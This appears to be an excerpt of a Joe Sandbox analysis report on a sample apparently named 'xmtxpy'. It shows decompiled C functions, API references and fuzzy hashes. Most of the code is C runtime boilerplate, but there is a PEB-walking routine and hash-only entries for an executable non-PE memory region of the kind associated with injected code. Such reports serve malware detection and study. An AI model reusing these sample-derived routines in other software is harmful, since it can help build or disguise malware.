                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008A1072
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: File$AllocCreateReadSizeVirtual
                          • String ID:
                          • API String ID: 4119528295-0
                          • Opcode ID: 00f36e19aa980255eda0a09e8a3703a49ae2a8a586d481ced770fd49409051de
                          • Instruction ID: 512f11380f59e6ff1d6efb79180cb5a40e6d22df8efc7c4ccd5dc9675f03655b
                          • Opcode Fuzzy Hash: 00f36e19aa980255eda0a09e8a3703a49ae2a8a586d481ced770fd49409051de
                          • Instruction Fuzzy Hash: DB819435905188EFDB01CBA8C991BDDBFB1AF56308F2886C4D6416B346C234AF91DF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 275 8b2397-8b23a1 276 8b23a3-8b23a4 275->276 277 8b2412-8b2424 call 8b13b0 call 8b10b7 275->277 279 8b23a5-8b23ac 276->279 293 8b2426-8b2428 277->293 281 8b23cb-8b23cd 279->281 282 8b23ae-8b23ca call 8af776 call 8af7d3 call 8aeec1 279->282 283 8b23cf-8b23d1 281->283 284 8b23d3-8b23d5 281->284 282->281 287 8b23d6-8b23e4 RtlAllocateHeap 283->287 284->287 291 8b240c-8b2410 287->291 292 8b23e6-8b23ef 287->292 291->293 295 8b23fe-8b2403 call 8b10b7 292->295 296 8b23f1-8b23fa call 8b13b0 292->296 303 8b2405-8b240a call 8b10b7 295->303 296->279 304 8b23fc 296->304 303->291 304->303
                          C-Code - Quality: 93%
                          			E008B2397(intOrPtr __ebx, void* __edx, void* __edi, long _a4) {
                          				void* __esi;
                          				void* _t2;
                          				void* _t6;
                          				void* _t7;
                          				void* _t11;
                          				long _t18;
                          				void* _t22;
                          				long _t25;
                          
                          				_t23 = __edi;
                          				_t22 = __edx;
                          				_t14 = __ebx;
                          				_t25 = _a4;
                          				if(_t25 > 0xffffffe0) {
                          					E008B13B0(_t2, _t25);
                          					 *((intOrPtr*)(E008B10B7(__eflags))) = 0xc;
                          					__eflags = 0;
                          					return 0;
                          				}
                          				_push(__ebx);
                          				_push(__edi);
                          				while(1) {
                          					_t6 =  *0x8bf100; // 0x4f0000
                          					_t27 = _t6;
                          					if(_t6 == 0) {
                          						E008AF776(_t14, _t22, _t23, _t25, _t27);
                          						E008AF7D3(_t14, _t22, _t23, _t25, 0x1e);
                          						E008AEEC1(0xff);
                          						_t6 =  *0x8bf100; // 0x4f0000
                          					}
                          					if(_t25 == 0) {
                          						_t18 = 1;
                          						__eflags = 1;
                          					} else {
                          						_t18 = _t25;
                          					}
                          					_t7 = RtlAllocateHeap(_t6, 0, _t18); // executed
                          					_t23 = _t7;
                          					if(_t23 != 0) {
                          						break;
                          					}
                          					_t14 = 0xc;
                          					if( *0x8bff38 == _t7) {
                          						 *((intOrPtr*)(E008B10B7(__eflags))) = _t14;
                          						L12:
                          						 *((intOrPtr*)(E008B10B7(_t31))) = _t14;
                          						break;
                          					}
                          					_t11 = E008B13B0(_t7, _t25);
                          					_t31 = _t11;
                          					if(_t11 != 0) {
                          						continue;
                          					}
                          					goto L12;
                          				}
                          				return _t23;
                          			}












                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 008B23AE
                            • Part of subcall function 008AF776: __NMSG_WRITE.LIBCMT ref: 008AF79D
                            • Part of subcall function 008AF776: __NMSG_WRITE.LIBCMT ref: 008AF7A7
                          • __NMSG_WRITE.LIBCMT ref: 008B23B5
                            • Part of subcall function 008AF7D3: GetModuleFileNameW.KERNEL32(00000000,008BF452,00000104,00000000,00000000,00000000), ref: 008AF865
                            • Part of subcall function 008AF7D3: ___crtMessageBoxW.LIBCMT ref: 008AF913
                            • Part of subcall function 008AEEC1: ExitProcess.KERNEL32 ref: 008AEED0
                            • Part of subcall function 008B10B7: __getptd_noexit.LIBCMT ref: 008B10B7
                          • RtlAllocateHeap.NTDLL(004F0000,00000000,00000001,00000000,00000000,00000000,?,008B039E,00000000,00000000,00000000,00000000,?,008B0253,00000018,008BCE98), ref: 008B23DA
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AllocateExitFileHeapMessageModuleNameProcess___crt__getptd_noexit
                          • String ID:
                          • API String ID: 3823847927-0
                          • Opcode ID: 2976d310d9c9350f581b8c3a643d41e8fe5cacbedb26f0111a0acf432e56652c
                          • Instruction ID: 1accad8a88c3a7f0b2e10b92a4d715941f6d615b070b797c7b9cc83ab44c0d0f
                          • Opcode Fuzzy Hash: 2976d310d9c9350f581b8c3a643d41e8fe5cacbedb26f0111a0acf432e56652c
                          • Instruction Fuzzy Hash: 5401F931300A519AE6113B3CEC51BAB3398FF5A364B100235F601DBBE2DE748C8185A6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008AFEE1(struct _EXCEPTION_POINTERS* _a4) {
                          
                          				SetUnhandledExceptionFilter(0);
                          				return UnhandledExceptionFilter(_a4);
                          			}



                          0x008afee6
                          0x008afef6

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 008AFEE6
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 008AFEEF
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 4669e86b246a113407a8bc6e9024439827345310c3821928331a89b46e86ce68
                          • Instruction ID: 9434d9507dacf8d68d9004800195ed528300ed101cbaed64fcbd77a202f26f67
                          • Opcode Fuzzy Hash: 4669e86b246a113407a8bc6e9024439827345310c3821928331a89b46e86ce68
                          • Instruction Fuzzy Hash: 4FB09235048209ABCB002B99EC0DB883F28FB14652F000190F74D440B09B675450AA91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008AFEB0(_Unknown_base(*)()* _a4) {
                          
                          				return SetUnhandledExceptionFilter(_a4);
                          			}



                          0x008afebd

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 008AFEB6
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: ff93acedd8299f02fb1351f54de61c2be84bc421079d9d6a2595bcc5671559b9
                          • Instruction ID: 0edf7a46ab94998a66a36bce5832ca761cace4635b79ac4e2a23007c63b72b9f
                          • Opcode Fuzzy Hash: ff93acedd8299f02fb1351f54de61c2be84bc421079d9d6a2595bcc5671559b9
                          • Instruction Fuzzy Hash: F6A0113000820CAB8A002B8AEC088C83F2CFA002A2B0000A0FA0C000308B23A8A0AA80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008AF18E() {
                          				void* _t3;
                          
                          				_t3 = GetProcessHeap();
                          				 *0x8bf100 = _t3;
                          				return 0 | _t3 != 0x00000000;
                          			}




                          0x008af18e
                          0x008af196
                          0x008af1a2

                          APIs
                          • GetProcessHeap.KERNEL32(008AE8C9), ref: 008AF18E
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 17e16af48363ad5197fcb3f56f4ce58fa98dabd8bee2a99c3d1be81cff7f9120
                          • Instruction ID: 601e2f135a33e663831fe08d3a140d79dc456c4a19ff11e2076013ac7ba08215
                          • Opcode Fuzzy Hash: 17e16af48363ad5197fcb3f56f4ce58fa98dabd8bee2a99c3d1be81cff7f9120
                          • Instruction Fuzzy Hash: 1CB012B03015028747090B3CBC2410937DCBF18201300423DB603C11B0DF30C4109B00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                          • Instruction ID: bd8f9bf8a7deeab3b8d12dea27c3e5602838ef34e7f0f22662be0631a8e4d997
                          • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                          • Instruction Fuzzy Hash: 8D112971A00128AFCB20DBA9E8888AEF7FDEF887907504165F804D3311E370DE60C660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                          • Instruction ID: 4b5c252bc03548354cd6320802630407d97c5a25068ab10930cad7fd6147a5fe
                          • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                          • Instruction Fuzzy Hash: 89E09A357606089FCB08CBA8D882D65B3F8EB1C320B114390F819C73A2EB34FE00DA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                          • Instruction ID: 89df3e36c5d435bc6314637e616c46a6ecfa34bc23df1f6fdca0373da2976240
                          • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                          • Instruction Fuzzy Hash: 30E086363105608FC322DA19E980852F3E9FB9C3B07154569EC8AD3712C330FC10CA50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000005.00000002.464093968.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_120000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008AE750() {
                          
                          				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14)))))) + 0x10));
                          			}



                          0x008ae763

                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 74ec8ed11678ff3a5584b8b4ea8402eaaafd729edba2b9505761833f1e6b03f6
                          • Instruction ID: 28bea104002c5a668ee2f95c3b8a520e3d52d72a39d127a2dfcce5072377f687
                          • Opcode Fuzzy Hash: 74ec8ed11678ff3a5584b8b4ea8402eaaafd729edba2b9505761833f1e6b03f6
                          • Instruction Fuzzy Hash: 47C00179651A40CFCB55CF08D294E01B7F4FB4D750B1644D1E9168B732C234E900DA11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E008AEDFA(void* __ebx, void* __edi, void* __eflags) {
                          				void* __esi;
                          				void* _t3;
                          				intOrPtr _t6;
                          				long* _t12;
                          				long _t14;
                          				void* _t19;
                          				void* _t21;
                          				void* _t25;
                          				long* _t26;
                          
                          				E008AEFA9(_t3, __ebx, __eflags);
                          				if(E008B02BA() != 0) {
                          					_t6 = E008AFB16(0x8aeb8b);
                          					 *0x8be000 = _t6;
                          					__eflags = _t6 - 0xffffffff;
                          					if(_t6 == 0xffffffff) {
                          						goto L1;
                          					} else {
                          						_t26 = E008B0340(1, 0x3bc);
                          						asm("lock pop ecx");
                          						_t19 = _t25;
                          						__eflags = _t26;
                          						if(_t26 == 0) {
                          							L7:
                          							E008AEE70();
                          							__eflags = 0;
                          							return 0;
                          						} else {
                          							_t12 = E008AFB72(_t19,  *0x8be000, _t26);
                          							_pop(_t21);
                          							__eflags = _t12;
                          							if(__eflags == 0) {
                          								goto L7;
                          							} else {
                          								_push(0);
                          								_push(_t26);
                          								E008AED47(__ebx, _t21, __edi, _t26, __eflags);
                          								_t14 = GetCurrentThreadId();
                          								_t26[1] = _t26[1] | 0xffffffff;
                          								 *_t26 = _t14;
                          								__eflags = 1;
                          								return 1;
                          							}
                          						}
                          					}
                          				} else {
                          					L1:
                          					E008AEE70();
                          					return 0;
                          				}
                          			}













                          APIs
                          • __init_pointers.LIBCMT ref: 008AEDFA
                            • Part of subcall function 008AEFA9: RtlEncodePointer.NTDLL(00000000,?,008AEDFF,008AE8DA), ref: 008AEFAC
                            • Part of subcall function 008AEFA9: __initp_misc_winsig.LIBCMT ref: 008AEFC7
                            • Part of subcall function 008AEFA9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008AFC2C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008AFC40
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008AFC53
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008AFC66
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008AFC79
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008AFC8C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008AFC9F
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008AFCB2
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008AFCC5
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008AFCD8
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008AFCEB
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008AFCFE
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008AFD11
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008AFD24
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008AFD37
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008AFD4A
                          • __mtinitlocks.LIBCMT ref: 008AEDFF
                          • __mtterm.LIBCMT ref: 008AEE08
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(?,?,?,?,008AEE6C), ref: 008B01D4
                            • Part of subcall function 008AEE70: _free.LIBCMT ref: 008B01DB
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(008BE050,?,?,008AEE6C), ref: 008B01FD
                          • __calloc_crt.LIBCMT ref: 008AEE2D
                          • __initptd.LIBCMT ref: 008AEE4F
                          • GetCurrentThreadId.KERNEL32(008AE8DA), ref: 008AEE56
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 3567560977-0
                          • Opcode ID: ea20bad41eda4547a5248adeb01d1754c579a6268649fc2e0c3d880b6d440346
                          • Instruction ID: 5818addd167e8e74cf8e56be3865739bf0e1a63963f318d768295572e4e5bb10
                          • Opcode Fuzzy Hash: ea20bad41eda4547a5248adeb01d1754c579a6268649fc2e0c3d880b6d440346
                          • Instruction Fuzzy Hash: 0FF0B432245B111AF6243B7CBC1B74B3681FB03730F200E29F161D99E2EF2094124552
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E008AEE8D(void* __ecx, intOrPtr _a4) {
                          				struct HINSTANCE__* _v8;
                          				_Unknown_base(*)()* _t4;
                          
                          				_t4 =  &_v8;
                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                          				if(_t4 != 0) {
                          					_t4 = GetProcAddress(_v8, "CorExitProcess");
                          					if(_t4 != 0) {
                          						return  *_t4(_a4);
                          					}
                          				}
                          				return _t4;
                          			}






                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E), ref: 008AEE9C
                          • GetProcAddress.KERNEL32(?,CorExitProcess,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E,00000000), ref: 008AEEAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction ID: db02c1f7bbd13a958da40bc1a58c1b6aab34935f565b77e06af8b5886e02d989
                          • Opcode Fuzzy Hash: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction Fuzzy Hash: 44D01230A44208BBDB115B91DC05F9A776DFB01741F040564FE58D5590DB719A149650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E008B458A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                          				char _v8;
                          				intOrPtr _v12;
                          				int _v20;
                          				int _t35;
                          				int _t38;
                          				intOrPtr* _t44;
                          				int _t47;
                          				short* _t49;
                          				intOrPtr _t50;
                          				intOrPtr _t54;
                          				int _t55;
                          				int _t59;
                          				char* _t62;
                          
                          				_t62 = _a8;
                          				if(_t62 == 0) {
                          					L5:
                          					return 0;
                          				}
                          				_t50 = _a12;
                          				if(_t50 == 0) {
                          					goto L5;
                          				}
                          				if( *_t62 != 0) {
                          					E008B0791( &_v20, _a16);
                          					_t35 = _v20;
                          					__eflags =  *(_t35 + 0xa8);
                          					if( *(_t35 + 0xa8) != 0) {
                          						_t38 = E008B44CC( *_t62 & 0x000000ff,  &_v20);
                          						__eflags = _t38;
                          						if(_t38 == 0) {
                          							__eflags = _a4;
                          							_t59 = 1;
                          							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                          							if(__eflags != 0) {
                          								L21:
                          								__eflags = _v8;
                          								if(_v8 != 0) {
                          									_t54 = _v12;
                          									_t31 = _t54 + 0x70;
                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                          									__eflags =  *_t31;
                          								}
                          								return _t59;
                          							}
                          							L20:
                          							_t44 = E008B10B7(__eflags);
                          							_t59 = _t59 | 0xffffffff;
                          							__eflags = _t59;
                          							 *_t44 = 0x2a;
                          							goto L21;
                          						}
                          						_t59 = _v20;
                          						__eflags =  *(_t59 + 0x74) - 1;
                          						if( *(_t59 + 0x74) <= 1) {
                          							L15:
                          							__eflags = _t50 -  *(_t59 + 0x74);
                          							L16:
                          							if(__eflags < 0) {
                          								goto L20;
                          							}
                          							__eflags = _t62[1];
                          							if(__eflags == 0) {
                          								goto L20;
                          							}
                          							L18:
                          							_t59 =  *(_t59 + 0x74);
                          							goto L21;
                          						}
                          						__eflags = _t50 -  *(_t59 + 0x74);
                          						if(__eflags < 0) {
                          							goto L16;
                          						}
                          						__eflags = _a4;
                          						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                          						_t59 = _v20;
                          						__eflags = _t47;
                          						if(_t47 != 0) {
                          							goto L18;
                          						}
                          						goto L15;
                          					}
                          					_t55 = _a4;
                          					__eflags = _t55;
                          					if(_t55 != 0) {
                          						 *_t55 =  *_t62 & 0x000000ff;
                          					}
                          					_t59 = 1;
                          					goto L21;
                          				}
                          				_t49 = _a4;
                          				if(_t49 != 0) {
                          					 *_t49 = 0;
                          				}
                          				goto L5;
                          			}

















                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B45C0
                          • __isleadbyte_l.LIBCMT ref: 008B45EE
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B461C
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B4652
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmp
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction ID: b94b253cd542ed38b82e61e7192ea3bbd12b33aa9e81b9c686609f39ed242f49
                          • Opcode Fuzzy Hash: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction Fuzzy Hash: 3D31D03060065AAFEB218F79CC46BFA7BB5FF42350F155529E864C72A2E730E854DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E008B2429(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                          				void* _t7;
                          				long _t8;
                          				intOrPtr* _t9;
                          				intOrPtr* _t12;
                          				long _t20;
                          				long _t31;
                          
                          				if(_a4 != 0) {
                          					_t31 = _a8;
                          					__eflags = _t31;
                          					if(_t31 != 0) {
                          						_push(__ebx);
                          						while(1) {
                          							__eflags = _t31 - 0xffffffe0;
                          							if(_t31 > 0xffffffe0) {
                          								break;
                          							}
                          							__eflags = _t31;
                          							if(_t31 == 0) {
                          								_t31 = _t31 + 1;
                          								__eflags = _t31;
                          							}
                          							_t7 = HeapReAlloc( *0x8bf100, 0, _a4, _t31);
                          							_t20 = _t7;
                          							__eflags = _t20;
                          							if(_t20 != 0) {
                          								L17:
                          								_t8 = _t20;
                          							} else {
                          								__eflags =  *0x8bff38 - _t7;
                          								if(__eflags == 0) {
                          									_t9 = E008B10B7(__eflags);
                          									 *_t9 = E008B10CA(GetLastError());
                          									goto L17;
                          								} else {
                          									__eflags = E008B13B0(_t7, _t31);
                          									if(__eflags == 0) {
                          										_t12 = E008B10B7(__eflags);
                          										 *_t12 = E008B10CA(GetLastError());
                          										L12:
                          										_t8 = 0;
                          										__eflags = 0;
                          									} else {
                          										continue;
                          									}
                          								}
                          							}
                          							goto L14;
                          						}
                          						E008B13B0(_t6, _t31);
                          						 *((intOrPtr*)(E008B10B7(__eflags))) = 0xc;
                          						goto L12;
                          					} else {
                          						E008B0308(_a4);
                          						_t8 = 0;
                          					}
                          					L14:
                          					return _t8;
                          				} else {
                          					return E008B2397(__ebx, __edx, __edi, _a8);
                          				}
                          			}










                          APIs
                          • _free.LIBCMT ref: 008B2448
                            • Part of subcall function 008B2397: __FF_MSGBANNER.LIBCMT ref: 008B23AE
                            • Part of subcall function 008B2397: __NMSG_WRITE.LIBCMT ref: 008B23B5
                            • Part of subcall function 008B2397: RtlAllocateHeap.NTDLL(004F0000,00000000,00000001,00000000,00000000,00000000,?,008B039E,00000000,00000000,00000000,00000000,?,008B0253,00000018,008BCE98), ref: 008B23DA
                          Memory Dump Source
